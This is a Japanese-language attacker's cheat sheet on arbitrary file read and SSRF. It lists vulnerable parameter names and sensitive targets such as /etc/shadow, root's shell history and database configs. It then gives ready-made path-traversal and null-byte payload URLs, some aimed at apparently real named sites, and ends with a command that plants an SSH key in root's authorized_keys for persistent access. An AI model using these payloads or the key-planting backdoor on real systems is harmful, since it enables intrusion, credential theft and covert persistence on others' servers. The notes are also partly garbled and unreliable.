ブラックホールノート1-任意ファイル読み込み


読書時間16.01.18 page 1-3

機密フィールド

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF

利用可能なパス


/etc/shadow /etc/passwd /etc/hosts /root/.bash_historyはuser add,cd,mysql,ssh,nohopを探して機密ディレクトリやファイルなどを見ます/etc/syscomfig/network-scripts/ifcfg-eth 1 sed-i'/95_251/d’/root/.ssh/authorized_keys url=file:///etc/passwd url=http://10.29.5.24(ssrfイントラネット探知)/opt/nginx/conf/nginx.conf file:///,gopher://,ftp:///configs/database.php

Payload

  • http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class
  • 配合遮断規則:/etc/passwd%00.jpg
  • ../../../../../../../../../../etc/passwd%00.jpg
  • http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355
  • http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
  • http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
  • echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >>/root/.ssh/authorized_keys